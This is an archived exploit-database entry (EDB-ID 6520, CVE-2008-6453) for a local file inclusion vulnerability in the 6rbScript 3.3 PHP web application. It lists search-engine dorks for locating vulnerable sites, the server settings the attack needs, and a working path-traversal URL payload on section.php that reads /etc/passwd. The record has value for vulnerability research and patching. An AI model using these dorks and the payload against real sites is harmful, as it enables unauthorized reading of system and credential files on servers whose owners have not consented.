6rbScript 3.3 section.php name Local File Inclusion Vulnerability

2008-09-21T00:00:00
ID EDB-ID:6520
Type exploitdb
Reporter Stack
Modified 2008-09-21T00:00:00

Description

6rbScript 3.3 (section.php name) Local File Inclusion Vulnerability. CVE-2008-6453. Webapps exploit for php platform

                                        
                                            |___________________________________________________|
|
| 6rbScript V3.3 Local file Vulnerability
|
|___________________________________________________
|                                                   |
|
| script : www.6rbscript.com
|
| DorK   : inurl:"section.php?name=singers"
| dorK   : Powered By 6rbScript V3.3
|___________________________________________________|
 
Author : Stack
 
Expl need magic quote = off & open basdir = off in many server
 
site.il/section.php?name=../../../../etc/passwd

# milw0rm.com [2008-09-21]